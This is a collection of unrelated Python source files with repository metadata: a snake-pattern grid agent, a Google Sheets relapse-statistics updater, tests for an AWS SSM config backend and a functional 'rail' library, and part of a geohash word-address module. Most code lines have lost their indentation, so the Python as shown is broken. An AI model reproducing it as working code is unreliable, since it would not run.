def sense(self, sensor):
pass
    # do not change the method signature; this is where the agent decides which way to move,
    # the function MUST return one of the values [Action.UP, Action.DOWN, Action.LEFT, Action.RIGHT]
def move(self):
if self.times_moved < self.width - 1:
self.times_moved += 1
return self.direction
else:
self.times_moved = 0
self.direction = Action.RIGHT if self.direction == Action.LEFT else Action.LEFT
return Action.DOWN
    # do not change the method signature; this is where the agent exposes its histogram (the one
    # from the histogram filter); it must be an array (list of lists, tuple of tuples...) with the
    # same dimensions as the board; reading agent.histogram()[y][x] returns the probability of
    # standing on the field in row y and column x
def histogram(self):
return self.hist
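# Illustrative gradient: on a 3x3 board the initial histogram is
# (y + x) / (width + height - 2), i.e. 0.0 at (0,0), 0.5 at (0,2), (1,1) and
# (2,0), and 1.0 at (2,2).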
|
uHappyLogic/lost-wumpus
|
agents/snake_agent.py
|
Python
|
mit
| 1,993
|
#!/usr/bin/python
import json
import gspread
from oauth2client.client import SignedJwtAssertionCredentials
import datetime
from participantCollection import ParticipantCollection
# Edit Me!
participantFileNames = ['../stayclean-2014-november/participants.txt',
'../stayclean-2014-december/participants.txt',
'../stayclean-2015-january/participants.txt',
'../stayclean-2015-february/participants.txt',
'../stayclean-2015-march/participants.txt',
'../stayclean-2015-april/participants.txt',
'../stayclean-2015-may/participants.txt',
'../stayclean-2015-june/participants.txt',
'../stayclean-2015-july/participants.txt',
'../stayclean-2015-august/participants.txt',
'../stayclean-2015-september/participants.txt',
'../stayclean-2015-october/participants.txt',
'../stayclean-2015-november/participants.txt',
'../stayclean-2015-december/participants.txt',
'../stayclean-2016-january/participants.txt',
'../stayclean-2016-february/participants.txt',
'../stayclean-2016-march/participants.txt',
'../stayclean-2016-april/participants.txt',
'../stayclean-2016-may/participants.txt',
'../stayclean-2016-june/participants.txt',
'../stayclean-2016-july/participants.txt',
'./participants.txt']
sortedRelapseDates = []
for participantFileName in participantFileNames:
participants = ParticipantCollection(fileNameString=participantFileName)
sortedRelapseDates = sortedRelapseDates + participants.allRelapseDates()
sortedRelapseDates.sort()
earliestReportDate = sortedRelapseDates[0]
latestReportDate = sortedRelapseDates[-1]
reportDates = []
numberOfRelapsesPerDate = []
reportDatesAndNumberOfRelapses = {}
dayOfWeekIndexesAndNumberOfInstances = {0: 0, 1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0}
reportDate = earliestReportDate
while reportDate <= latestReportDate:
reportDatesAndNumberOfRelapses[reportDate] = 0
# dayOfWeekIndexesAndNumberOfInstances[reportDate.weekday()] = dayOfWeekIndexesAndNumberOfInstances[reportDate.weekday()] + 1
dayOfWeekIndexesAndNumberOfInstances[reportDate.weekday()] += 1
reportDate += datetime.timedelta(days=1)
for relapseDate in sortedRelapseDates:
# reportDatesAndNumberOfRelapses[relapseDate] = reportDatesAndNumberOfRelapses[relapseDate] + 1
reportDatesAndNumberOfRelapses[relapseDate] += 1
dayOfWeekIndexesAndTotalNumberOfRelapses = {0: 0, 1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0}
for participantFileName in participantFileNames:
participants = ParticipantCollection(fileNameString=participantFileName)
# print participants.relapseDayOfWeekIndexesAndParticipants()
for index, parts in participants.relapseDayOfWeekIndexesAndParticipants().iteritems():
# dayOfWeekIndexesAndTotalNumberOfRelapses[index] = dayOfWeekIndexesAndTotalNumberOfRelapses[index] + len(parts)
dayOfWeekIndexesAndTotalNumberOfRelapses[index] += len(parts)
dayOfWeekIndexesAndAverageNumberOfRelapses = {0: 0, 1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0}
for index, instances in dayOfWeekIndexesAndNumberOfInstances.iteritems():
# dayOfWeekIndexesAndAverageNumberOfRelapses[index] = int(round(float(dayOfWeekIndexesAndTotalNumberOfRelapses[index]) / float(instances)))
dayOfWeekIndexesAndAverageNumberOfRelapses[index] = float(dayOfWeekIndexesAndTotalNumberOfRelapses[index]) / float(instances)
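# Worked example: if Mondays occurred 100 times across all the tracked months
# and 50 relapses in total were reported on Mondays, the average stored for
# Monday here is 50.0 / 100.0 == 0.5.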
spreadsheetTitle = "StayClean monthly challenge relapse data"
# spreadsheetTitle = "Test spreadsheet"
json_key = json.load(open('../google-oauth-credentials.json'))
scope = ['https://spreadsheets.google.com/feeds']
credentials = SignedJwtAssertionCredentials(json_key['client_email'], json_key['private_key'].encode(), scope)
gc = gspread.authorize(credentials)
spreadSheet = None
try:
spreadSheet = gc.open(spreadsheetTitle)
except gspread.exceptions.SpreadsheetNotFound:
print "No spreadsheet with title " + spreadsheetTitle
exit(1)
workSheet = spreadSheet.get_worksheet(0)
columnACells = workSheet.range("A2:A" + str(len(reportDatesAndNumberOfRelapses) + 1))
columnBCells = workSheet.range("B2:B" + str(len(reportDatesAndNumberOfRelapses) + 1))
columnCCells = workSheet.range("C2:C8")
columnDCells = workSheet.range("D2:D8")
reportDate = earliestReportDate
rowIndex = 0
while reportDate <= latestReportDate:
columnACells[rowIndex].value = str(reportDate)
columnBCells[rowIndex].value = str(reportDatesAndNumberOfRelapses[reportDate])
rowIndex += 1
reportDate += datetime.timedelta(days=1)
for weekdayIndex in range(0, 7):
weekdayName = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday'][weekdayIndex]
# spreadsheetClient.UpdateCell(weekdayIndex + 2,3,weekdayName,spreadsheetId)
# spreadsheetClient.UpdateCell(weekdayIndex + 2,4,str(dayOfWeekIndexesAndAverageNumberOfRelapses[weekdayIndex]),spreadsheetId)
columnCCells[weekdayIndex].value = weekdayName
columnDCells[weekdayIndex].value = str(dayOfWeekIndexesAndAverageNumberOfRelapses[weekdayIndex])
allCells = columnACells + columnBCells + columnCCells + columnDCells
workSheet.update_cells(allCells)
exit(0)
|
foobarbazblarg/stayclean
|
stayclean-2016-august/update-google-chart.py
|
Python
|
mit
| 5,485
|
import pretend
import pytest
from botocore.exceptions import ClientError
from configstore.backends.awsssm import AwsSsmBackend
def test_awsssm_init_bad_install(monkeypatch):
monkeypatch.setattr('configstore.backends.awsssm.boto3', None)
with pytest.raises(ImportError):
AwsSsmBackend()
def test_awsssm_success(monkeypatch):
response = {'Parameter': {
'Value': 'postgres://localhost/app',
}}
fake_client = pretend.stub(
get_parameter=pretend.call_recorder(lambda Name, WithDecryption: response),
)
fake_boto3 = pretend.stub(
client=pretend.call_recorder(lambda service: fake_client),
)
monkeypatch.setattr('configstore.backends.awsssm.boto3', fake_boto3)
b = AwsSsmBackend()
value = b.get_setting('DATABASE_URL')
assert value == 'postgres://localhost/app'
assert fake_boto3.client.calls == [pretend.call('ssm')]
assert fake_client.get_parameter.calls == [
pretend.call(Name='DATABASE_URL', WithDecryption=True),
]
def test_awsssm_success_with_prefix(monkeypatch):
response = {'Parameter': {
'Value': 'off',
}}
fake_client = pretend.stub(
get_parameter=pretend.call_recorder(lambda Name, WithDecryption: response),
)
fake_boto3 = pretend.stub(
client=pretend.call_recorder(lambda service: fake_client),
)
monkeypatch.setattr('configstore.backends.awsssm.boto3', fake_boto3)
b = AwsSsmBackend('/myapp/staging/')
value = b.get_setting('DEBUG')
assert value == 'off'
assert fake_boto3.client.calls == [pretend.call('ssm')]
assert fake_client.get_parameter.calls == [
pretend.call(Name='/myapp/staging/DEBUG', WithDecryption=True),
]
def test_awsssm_missing(monkeypatch):
error = ClientError({'Error': {'Code': 'ParameterNotFound'}}, 'get_parameter')
fake_client = pretend.stub(
get_parameter=pretend.raiser(error),
)
fake_boto3 = pretend.stub(
client=lambda service: fake_client,
)
monkeypatch.setattr('configstore.backends.awsssm.boto3', fake_boto3)
b = AwsSsmBackend()
value = b.get_setting('/app1/TEMPLATE_DEBUG')
assert value is None
def test_awsssm_missing_with_prefix(monkeypatch):
error = ClientError({'Error': {'Code': 'ParameterNotFound'}}, 'get_parameter')
fake_client = pretend.stub(
get_parameter=pretend.raiser(error),
)
fake_boto3 = pretend.stub(
client=lambda service: fake_client,
)
monkeypatch.setattr('configstore.backends.awsssm.boto3', fake_boto3)
b = AwsSsmBackend('/app1/')
value = b.get_setting('TEMPLATE_DEBUG')
assert value is None
def test_awsssm_error(monkeypatch):
error = ClientError({'Error': {'Code': 'SomethingBad'}}, 'get_parameter')
fake_client = pretend.stub(
get_parameter=pretend.raiser(error),
)
fake_boto3 = pretend.stub(
client=lambda service: fake_client,
)
monkeypatch.setattr('configstore.backends.awsssm.boto3', fake_boto3)
b = AwsSsmBackend('/app1/')
with pytest.raises(ClientError):
b.get_setting('TEMPLATE_DEBUG')
|
caravancoop/configstore
|
tests/test_awsssm.py
|
Python
|
mit
| 3,127
|
import sys
import traceback
import unittest
import unittest.mock
import rail
class TestIdentity(unittest.TestCase):
def test_returns_input_value(self):
value = unittest.mock.Mock()
self.assertEqual(value, rail.identity(value))
class TestNot(unittest.TestCase):
def test_returns_inverse_for_bool(self):
        self.assertEqual(True, rail.not_(False))
        self.assertEqual(False, rail.not_(True))
    def test_returns_inverse_for_truthy(self):
        self.assertEqual(True, rail.not_([]))
        self.assertEqual(False, rail.not_([0]))
class TestRaise(unittest.TestCase):
def test_raises_exception(self):
with self.assertRaises(ValueError) as context:
rail.raise_(ValueError('exception'))
self.assertEqual('exception', str(context.exception))
def test_preserves_traceback_when_reraising_without_exception(self):
def func(exception):
raise exception
try:
try:
func(ValueError('exception'))
except ValueError:
expected_exc_info = sys.exc_info()
rail.raise_()
except ValueError:
actual_exc_info = sys.exc_info()
self.assertEqual(expected_exc_info[0], actual_exc_info[0])
self.assertEqual(expected_exc_info[1], actual_exc_info[1])
expected_tb = traceback.format_tb(expected_exc_info[2])
actual_tb = traceback.format_tb(actual_exc_info[2])
self.assertEqual(expected_tb, actual_tb[-len(expected_tb):])
def test_preserves_traceback_when_reraising_with_exception(self):
def func(exception):
raise exception
try:
try:
func(ValueError('exception'))
except ValueError as exception:
expected_exc_info = sys.exc_info()
rail.raise_(exception)
except ValueError:
actual_exc_info = sys.exc_info()
self.assertEqual(expected_exc_info[0], actual_exc_info[0])
self.assertEqual(expected_exc_info[1], actual_exc_info[1])
expected_tb = traceback.format_tb(expected_exc_info[2])
actual_tb = traceback.format_tb(actual_exc_info[2])
self.assertEqual(expected_tb, actual_tb[-len(expected_tb):])
class TestTry(unittest.TestCase):
def test_no_exception_raised(self):
input = unittest.mock.Mock()
expected_value = unittest.mock.Mock()
func = unittest.mock.Mock(return_value=expected_value)
handle = unittest.mock.Mock()
self.assertEqual(expected_value, rail.try_(func, handle)(input))
func.assert_called_once_with(input)
handle.assert_not_called()
def test_exception_raised(self):
input = unittest.mock.Mock()
exception = ValueError('value')
func = unittest.mock.Mock(side_effect=lambda _: rail.raise_(exception))
output = unittest.mock.Mock()
handle = unittest.mock.Mock(return_value=output)
self.assertEqual(output, rail.try_(func, handle)(input))
func.assert_called_once_with(input)
handle.assert_called_once_with(exception)
class TestMatch(unittest.TestCase):
def test_no_match_statements_provided(self):
value = unittest.mock.Mock()
with self.assertRaises(rail.UnmatchedValueError) as context:
rail.match()(value)
self.assertEqual(value, context.exception.value)
def test_value_unmatched_by_all_match_statements(self):
value = unittest.mock.Mock()
with self.assertRaises(rail.UnmatchedValueError) as context:
match = rail.match(
(lambda _: False, lambda _: unittest.mock.Mock()),
(lambda _: False, lambda _: unittest.mock.Mock()),
(lambda _: False, lambda _: unittest.mock.Mock())
)
match(value)
self.assertEqual(value, context.exception.value)
def test_value_matches_single_match_statement(self):
expected_value = unittest.mock.Mock()
match = rail.match(
(lambda _: False, lambda _: unittest.mock.Mock()),
(lambda _: True, lambda _: expected_value),
(lambda _: False, lambda _: unittest.mock.Mock())
)
self.assertEqual(expected_value, match(unittest.mock.Mock()))
def test_value_matches_multiple_match_statements(self):
expected_value = unittest.mock.Mock()
match = rail.match(
(lambda _: False, lambda _: unittest.mock.Mock()),
(lambda _: True, lambda _: expected_value),
(lambda _: True, lambda _: unittest.mock.Mock())
)
self.assertEqual(expected_value, match(unittest.mock.Mock()))
class TestMatchType(unittest.TestCase):
def test_no_match_statements_provided(self):
value = unittest.mock.Mock()
with self.assertRaises(rail.UnmatchedValueError) as context:
rail.match_type()(value)
self.assertEqual(value, context.exception.value)
def test_value_unmatched_by_all_match_statements(self):
value = unittest.mock.Mock()
with self.assertRaises(rail.UnmatchedValueError) as context:
match = rail.match_type(
(str, lambda _: unittest.mock.Mock()),
(float, lambda _: unittest.mock.Mock()),
(Exception, lambda _: unittest.mock.Mock())
)
match(value)
self.assertEqual(value, context.exception.value)
def test_value_matches_single_match_statement(self):
expected_value = unittest.mock.Mock()
match = rail.match_type(
(int, lambda _: unittest.mock.Mock()),
(unittest.mock.Mock, lambda _: expected_value),
(dict, lambda _: unittest.mock.Mock())
)
self.assertEqual(expected_value, match(unittest.mock.Mock()))
def test_value_matches_multiple_match_statements(self):
expected_value = unittest.mock.Mock()
match = rail.match_type(
(bool, lambda _: unittest.mock.Mock()),
(unittest.mock.Mock, lambda _: expected_value),
(unittest.mock.Mock, lambda _: unittest.mock.Mock())
)
self.assertEqual(expected_value, match(unittest.mock.Mock()))
def test_value_subclass_of_match_type(self):
expected_value = unittest.mock.Mock()
match = rail.match_type(
(bool, lambda _: unittest.mock.Mock()),
(object, lambda _: expected_value),
(unittest.mock.Mock, lambda _: unittest.mock.Mock())
)
self.assertEqual(expected_value, match(unittest.mock.Mock()))
class TestMatchLength(unittest.TestCase):
def test_no_match_statements_provided(self):
value = unittest.mock.Mock()
with self.assertRaises(rail.UnmatchedValueError) as context:
rail.match_length()(value)
self.assertEqual(value, context.exception.value)
def test_value_unmatched_by_all_match_statements(self):
value = unittest.mock.Mock()
value.__len__ = unittest.mock.Mock(return_value=2)
with self.assertRaises(rail.UnmatchedValueError) as context:
match = rail.match_length(
(rail.eq(8), lambda _: unittest.mock.Mock()),
(rail.gt(3), lambda _: unittest.mock.Mock())
)
match(value)
self.assertEqual(value, context.exception.value)
def test_value_matches_single_match_statement(self):
expected_value = unittest.mock.Mock()
match = rail.match_length(
(rail.lt(0), lambda _: unittest.mock.Mock()),
(rail.eq(0), lambda _: expected_value),
(rail.gt(0), lambda _: unittest.mock.Mock())
)
value = unittest.mock.Mock()
value.__len__ = unittest.mock.Mock(return_value=0)
self.assertEqual(expected_value, match(value))
def test_value_matches_multiple_match_statements(self):
expected_value = unittest.mock.Mock()
match = rail.match_length(
(rail.lt(0), lambda _: unittest.mock.Mock()),
(rail.ge(0), lambda _: expected_value),
(rail.eq(0), lambda _: unittest.mock.Mock())
)
value = unittest.mock.Mock()
value.__len__ = unittest.mock.Mock(return_value=0)
self.assertEqual(expected_value, match(value))
class TestPartial(unittest.TestCase):
def test_func_with_no_args(self):
@rail.partial
def func():
return 'value'
self.assertEqual('value', func())
def test_func_with_single_arg(self):
@rail.partial
def func(arg):
return arg
value = unittest.mock.Mock()
self.assertEqual(value, func(value))
def test_func_with_multiple_args(self):
@rail.partial
def func(arg1, arg2, arg3):
return arg1, arg2, arg3
val1 = unittest.mock.Mock()
val2 = unittest.mock.Mock()
val3 = unittest.mock.Mock()
self.assertEqual((val1, val2, val3), func(val1, val2, val3))
self.assertEqual((val1, val2, val3), func(val1)(val2, val3))
self.assertEqual((val1, val2, val3), func(val1, val2)(val3))
self.assertEqual((val1, val2, val3), func(val1)(val2)(val3))
def test_func_with_arguments_applied_out_of_order(self):
@rail.partial
def func(arg1, arg2, arg3):
return arg1, arg2, arg3
val1 = unittest.mock.Mock()
val2 = unittest.mock.Mock()
val3 = unittest.mock.Mock()
self.assertEqual((val1, val2, val3), func(arg2=val2)(val1, val3))
self.assertEqual((val1, val2, val3), func(arg3=val3)(val1, val2))
self.assertEqual(
(val1, val2, val3), func(arg2=val2, arg3=val3)(val1)
)
self.assertEqual(
(val1, val2, val3), func(arg3=val3)(arg2=val2)(val1)
)
self.assertEqual((val1, val2, val3), func(val1, arg3=val3)(val2))
def test_func_with_default_arguments(self):
@rail.partial
def func(arg1, arg2, arg3='val3', arg4='val4'):
return arg1, arg2, arg3, arg4
val1 = unittest.mock.Mock()
val2 = unittest.mock.Mock()
val3 = unittest.mock.Mock()
val4 = unittest.mock.Mock()
self.assertEqual((val1, val2, 'val3', 'val4'), func(val1, val2))
self.assertEqual((val1, val2, 'val3', 'val4'), func(val1)(val2))
self.assertEqual(
(val1, val2, val3, val4), func(val1, val2, val3, val4)
)
self.assertEqual(
(val1, val2, val3, val4), func(val1)(val2, val3, val4)
)
self.assertEqual(
(val1, val2, val3, val4), func(val1, arg3=val3)(val2, val4)
)
def test_func_with_default_arguments_only(self):
@rail.partial
def func(arg1='val1', arg2='val2'):
return arg1, arg2
val1 = unittest.mock.Mock()
val2 = unittest.mock.Mock()
self.assertEqual(('val1', 'val2'), func())
self.assertEqual((val1, 'val2'), func(val1))
self.assertEqual(('val1', val2), func(arg2=val2))
self.assertEqual((val1, val2), func(val1, val2))
def test_func_with_argument_list(self):
@rail.partial
def func(arg1, arg2, *args):
return (arg1, arg2) + args
val1 = unittest.mock.Mock()
val2 = unittest.mock.Mock()
val3 = unittest.mock.Mock()
val4 = unittest.mock.Mock()
self.assertEqual((val1, val2), func(val1, val2))
self.assertEqual((val1, val2), func(val1)(val2))
self.assertEqual(
(val1, val2, val3, val4), func(val1, val2, val3, val4)
)
self.assertEqual(
(val1, val2, val3, val4), func(val1)(val2, val3, val4)
)
def test_func_with_argument_list_only(self):
@rail.partial
def func(*args):
return args
val1 = unittest.mock.Mock()
val2 = unittest.mock.Mock()
self.assertEqual((), func())
self.assertEqual((val1,), func(val1))
self.assertEqual((val1, val2), func(val1, val2))
def test_func_with_keyword_arguments(self):
@rail.partial
def func(arg1, arg2, **kwargs):
return (arg1, arg2) + ((kwargs,) if kwargs else ())
val1 = unittest.mock.Mock()
val2 = unittest.mock.Mock()
val3 = unittest.mock.Mock()
val4 = unittest.mock.Mock()
self.assertEqual((val1, val2), func(val1, val2))
self.assertEqual((val1, val2), func(val1)(val2))
self.assertEqual(
(val1, val2, {'val3': val3, 'val4': val4}),
func(val1, val2, val3=val3, val4=val4)
)
self.assertEqual(
(val1, val2, {'val3': val3, 'val4': val4}),
func(val1, val3=val3)(val2, val4=val4)
)
def test_func_with_keyword_arguments_only(self):
@rail.partial
def func(**kwargs):
return kwargs
val1 = unittest.mock.Mock()
val2 = unittest.mock.Mock()
self.assertEqual({}, func())
self.assertEqual({'arg1': val1}, func(arg1=val1))
self.assertEqual(
{'arg1': val1, 'arg2': val2}, func(arg1=val1, arg2=val2)
)
def test_docstring_preserved(self):
@rail.partial
def func1(arg1, arg2):
"""Docstring for func"""
return arg1, arg2
self.assertEqual('Docstring for func', func1.__doc__)
func2 = func1(unittest.mock.Mock())
self.assertEqual('Docstring for func', func2.__doc__)
class TestCompose(unittest.TestCase):
def test_compose_with_no_funcs(self):
func = rail.compose()
value = unittest.mock.Mock()
self.assertEqual(value, func(value))
def test_compose_with_no_exception(self):
expected_value = unittest.mock.Mock()
func = rail.compose(
lambda value: expected_value
)
self.assertEqual(expected_value, func(unittest.mock.Mock()))
def test_compose_with_exception(self):
with self.assertRaises(ValueError) as context:
func = rail.compose(
lambda value: rail.raise_(ValueError('exception'))
)
func(unittest.mock.Mock())
self.assertEqual('exception', str(context.exception))
def test_compose_with_multiple_funcs(self):
return_value1 = unittest.mock.Mock()
return_value2 = unittest.mock.Mock()
return_value3 = unittest.mock.Mock()
func1 = unittest.mock.Mock(return_value=return_value1)
func2 = unittest.mock.Mock(return_value=return_value2)
func3 = unittest.mock.Mock(return_value=return_value3)
func = rail.compose(
func1,
func2,
func3
)
value = unittest.mock.Mock()
self.assertEqual(return_value3, func(value))
func1.assert_called_once_with(value)
func2.assert_called_once_with(return_value1)
func3.assert_called_once_with(return_value2)
class TestPipe(unittest.TestCase):
def test_pipe(self):
val1 = unittest.mock.Mock()
val2 = unittest.mock.Mock()
val3 = unittest.mock.Mock()
self.assertEqual(
(val1, val2, val3),
rail.pipe(
(val1,),
lambda val: val + (val2,),
lambda val: val + (val3,)
)
)
def test_use_pipe_to_create_scope(self):
val1 = unittest.mock.Mock()
val2 = unittest.mock.Mock()
val3 = unittest.mock.Mock()
self.assertEqual(
(val1, val2, val3),
rail.pipe(
(val1,),
lambda arg1: rail.pipe(
(val2,),
lambda arg2: arg1 + arg2,
lambda arg: arg + (val3,)
)
)
)
class TestTee(unittest.TestCase):
def test_with_multiple_funcs(self):
input = unittest.mock.Mock()
func1 = unittest.mock.Mock(return_value=unittest.mock.Mock())
func2 = unittest.mock.Mock(return_value=unittest.mock.Mock())
func3 = unittest.mock.Mock()
self.assertEqual(
input,
rail.pipe(input, rail.tee(func1, func2, func3))
)
func1.assert_called_once_with(input)
func2.assert_called_once_with(func1.return_value)
func3.assert_called_once_with(func2.return_value)
class TestCallWith(unittest.TestCase):
def test_calls_function_with_value(self):
value = unittest.mock.Mock()
func = unittest.mock.Mock()
rail.call_with(value, func)
func.assert_called_once_with(value)
def test_partial_application(self):
value = unittest.mock.Mock()
func = unittest.mock.Mock()
rail.pipe(func, rail.call_with(value))
def test_returns_func_return_value(self):
return_value = unittest.mock.Mock()
func = unittest.mock.Mock(return_value=return_value)
self.assertEqual(
return_value, rail.call_with(unittest.mock.Mock(), func)
)
class TestLt(unittest.TestCase):
def test_pipe_returns_true(self):
self.assertTrue(rail.pipe(5, rail.lt(7)))
def test_pipe_returns_false(self):
self.assertFalse(rail.pipe(8, rail.lt(1)))
class TestLe(unittest.TestCase):
def test_pipe_returns_true_for_different_values(self):
self.assertTrue(rail.pipe(5, rail.le(7)))
def test_pipe_returns_true_for_equal_values(self):
self.assertTrue(rail.pipe(5, rail.le(5)))
def test_pipe_returns_false(self):
self.assertFalse(rail.pipe(8, rail.le(1)))
class TestEq(unittest.TestCase):
def test_pipe_returns_true(self):
value = unittest.mock.Mock()
self.assertTrue(rail.pipe(value, rail.eq(value)))
def test_pipe_returns_false(self):
value1 = unittest.mock.Mock()
value2 = unittest.mock.Mock()
self.assertFalse(rail.pipe(value1, rail.eq(value2)))
class TestNe(unittest.TestCase):
def test_pipe_returns_true(self):
value1 = unittest.mock.Mock()
value2 = unittest.mock.Mock()
self.assertTrue(rail.pipe(value1, rail.ne(value2)))
def test_pipe_returns_false(self):
value = unittest.mock.Mock()
self.assertFalse(rail.pipe(value, rail.ne(value)))
class TestGt(unittest.TestCase):
def test_pipe_returns_true(self):
self.assertTrue(rail.pipe(4, rail.gt(0)))
def test_pipe_returns_false(self):
self.assertFalse(rail.pipe(13, rail.gt(15)))
class TestGe(unittest.TestCase):
def test_pipe_returns_true_for_different_values(self):
self.assertTrue(rail.pipe(6, rail.ge(2)))
def test_pipe_returns_true_for_equal_values(self):
self.assertTrue(rail.pipe(4, rail.ge(4)))
def test_pipe_returns_false(self):
self.assertFalse(rail.pipe(6, rail.ge(9)))
class TestTrack(unittest.TestCase):
def test_compose_with_existing_func(self):
return_value1 = unittest.mock.Mock()
return_value2 = unittest.mock.Mock()
return_value3 = unittest.mock.Mock()
func1 = unittest.mock.Mock(return_value=return_value1)
func2 = unittest.mock.Mock(return_value=return_value2)
func3 = unittest.mock.Mock(return_value=return_value3)
func = rail.Track().compose(
func1
).compose(
func2,
func3
)
value = unittest.mock.Mock()
self.assertEqual(return_value3, func(value))
func1.assert_called_once_with(value)
func2.assert_called_once_with(return_value1)
func3.assert_called_once_with(return_value2)
def test_tee_called_consecutively(self):
func1 = unittest.mock.Mock()
func2 = unittest.mock.Mock()
func = rail.Track().tee(
func1
).tee(
func2
)
value = unittest.mock.Mock()
self.assertEqual(value, func(value))
func1.assert_called_once_with(value)
func2.assert_called_once_with(value)
def test_fold_with_no_exception(self):
expected_value = unittest.mock.Mock()
func = rail.Track().compose(
lambda value: unittest.mock.Mock()
).fold(
lambda value: expected_value,
lambda exception: self.fail()
)
self.assertEqual(expected_value, func(unittest.mock.Mock()))
def test_fold_with_exception(self):
expected_exception = KeyError('key')
actual_exception = rail.pipe(
unittest.mock.Mock(),
rail.Track().compose(
lambda _: rail.raise_(expected_exception)
).fold(
lambda _: self.fail(),
rail.identity
)
)
self.assertEqual(expected_exception, actual_exception)
def test_fold_traceback_with_exception(self):
exception = KeyError('key')
func = rail.Track().compose(
lambda _: rail.raise_(exception)
)
try:
func(unittest.mock.Mock())
except KeyError:
expected_exc_info = sys.exc_info()
try:
rail.pipe(
unittest.mock.Mock(),
func.fold(
lambda _: self.fail(),
rail.raise_
)
)
except KeyError:
actual_exc_info = sys.exc_info()
self.assertEqual(expected_exc_info[0], actual_exc_info[0])
self.assertEqual(expected_exc_info[1], actual_exc_info[1])
expected_tb = traceback.format_tb(expected_exc_info[2])
actual_tb = traceback.format_tb(actual_exc_info[2])
self.assertEqual(expected_tb, actual_tb[-len(expected_tb):])
def test_handle_with_multiple_funcs(self):
expected_exception = ValueError('value')
func = rail.Track().compose(
lambda value: rail.raise_(ValueError('value'))
).handle(
lambda exception: unittest.mock.Mock(),
lambda exception: expected_exception
)
self.assertEqual(expected_exception, func(unittest.mock.Mock()))
def test_handle_with_no_exception(self):
expected_value = unittest.mock.Mock()
func = rail.Track().compose(
lambda value: expected_value
).handle(
lambda exception: self.fail()
)
self.assertEqual(expected_value, func(unittest.mock.Mock()))
def test_handle_with_exception(self):
expected_exception = KeyError('key')
actual_exception = rail.pipe(
unittest.mock.Mock(),
rail.Track().compose(
lambda _: rail.raise_(expected_exception)
).handle(
rail.identity
)
)
self.assertEqual(expected_exception, actual_exception)
def test_handle_traceback_with_exception(self):
exception = KeyError('key')
func = rail.Track().compose(
lambda _: rail.raise_(exception)
)
try:
func(unittest.mock.Mock())
except KeyError:
expected_exc_info = sys.exc_info()
try:
rail.pipe(
unittest.mock.Mock(),
func.handle(
rail.raise_
)
)
except KeyError:
actual_exc_info = sys.exc_info()
self.assertEqual(expected_exc_info[0], actual_exc_info[0])
self.assertEqual(expected_exc_info[1], actual_exc_info[1])
expected_tb = traceback.format_tb(expected_exc_info[2])
actual_tb = traceback.format_tb(actual_exc_info[2])
self.assertEqual(expected_tb, actual_tb[-len(expected_tb):])
if __name__ == '__main__':
unittest.main()
|
rob-earwaker/rail
|
test_rail.py
|
Python
|
mit
| 23,712
|
"""
thisplace: Human-readable addresses for every 3x3m square on the earth's surface.
The simplest way to use this module is through the `four_words` and `decode`
functions. For more, see `WordHasher`.
"""
import random
import geohash
def get_words(fname):
lines = open(fname)
words = []
for word in lines:
words.append(word.strip())
lines.close()
random.seed(634634)
random.shuffle(words)
words = words[:2**15]
assert len(words) == len(set(words))
return words
# These read like alien races from a sci-fi book
GOOGLE_WORDLIST = get_words("words/google-ngram-list")
# shorter list with only 4096 words
GOOGLE_4096WORDS = get_words("words/google-ngram-list-4096")
# current best list for the three word hash
WORDNET_LEMMAS = get_words("words/wordnet-list")
# Human friendly word list, taken directly from humanhash project
# these are the best words but there are not enough of
# them so we only use them for the six word hash
HUMAN_WORDLIST = (
'ack', 'alabama', 'alanine', 'alaska', 'alpha', 'angel', 'apart', 'april',
'arizona', 'arkansas', 'artist', 'asparagus', 'aspen', 'august', 'autumn',
'avocado', 'bacon', 'bakerloo', 'batman', 'beer', 'berlin', 'beryllium',
'black', 'blossom', 'blue', 'bluebird', 'bravo', 'bulldog', 'burger',
'butter', 'california', 'carbon', 'cardinal', 'carolina', 'carpet', 'cat',
'ceiling', 'charlie', 'chicken', 'coffee', 'cola', 'cold', 'colorado',
'comet', 'connecticut', 'crazy', 'cup', 'dakota', 'december', 'delaware',
'delta', 'diet', 'don', 'double', 'early', 'earth', 'east', 'echo',
'edward', 'eight', 'eighteen', 'eleven', 'emma', 'enemy', 'equal',
'failed', 'fanta', 'fifteen', 'fillet', 'finch', 'fish', 'five', 'fix',
'floor', 'florida', 'football', 'four', 'fourteen', 'foxtrot', 'freddie',
'friend', 'fruit', 'gee', 'georgia', 'glucose', 'golf', 'green', 'grey',
'hamper', 'happy', 'harry', 'hawaii', 'helium', 'high', 'hot', 'hotel',
'hydrogen', 'idaho', 'illinois', 'india', 'indigo', 'ink', 'iowa',
'island', 'item', 'jersey', 'jig', 'johnny', 'juliet', 'july', 'jupiter',
'kansas', 'kentucky', 'kilo', 'king', 'kitten', 'lactose', 'lake', 'lamp',
'lemon', 'leopard', 'lima', 'lion', 'lithium', 'london', 'louisiana',
'low', 'magazine', 'magnesium', 'maine', 'mango', 'march', 'mars',
'maryland', 'massachusetts', 'may', 'mexico', 'michigan', 'mike',
'minnesota', 'mirror', 'mississippi', 'missouri', 'mobile', 'mockingbird',
'monkey', 'montana', 'moon', 'mountain', 'muppet', 'music', 'nebraska',
'neptune', 'network', 'nevada', 'nine', 'nineteen', 'nitrogen', 'north',
'november', 'nuts', 'october', 'ohio', 'oklahoma', 'one', 'orange',
'oranges', 'oregon', 'oscar', 'oven', 'oxygen', 'papa', 'paris', 'pasta',
'pennsylvania', 'pip', 'pizza', 'pluto', 'potato', 'princess', 'purple',
'quebec', 'queen', 'quiet', 'red', 'river', 'robert', 'robin', 'romeo',
'rugby', 'sad', 'salami', 'saturn', 'september', 'seven', 'seventeen',
'shade', 'sierra', 'single', 'sink', 'six', 'sixteen', 'skylark', 'snake',
'social', 'sodium', 'solar', 'south', 'spaghetti', 'speaker', 'spring',
'stairway', 'steak', 'stream', 'summer', 'sweet', 'table', 'tango', 'ten',
'tennessee', 'tennis', 'texas', 'thirteen', 'three', 'timing', 'triple',
'twelve', 'twenty', 'two', 'uncle', 'undress', 'uniform', 'uranus', 'utah',
'vegan', 'venus', 'vermont', 'victor', 'video', 'violet', 'virginia',
'washington', 'west', 'whiskey', 'white', 'william', 'winner', 'winter',
'wisconsin', 'wolfram', 'wyoming', 'xray', 'yankee', 'yellow', 'zebra',
'zulu')
class WordHasher(object):
def __init__(self):
"""Convert latitude and longitudes into human readable strings."""
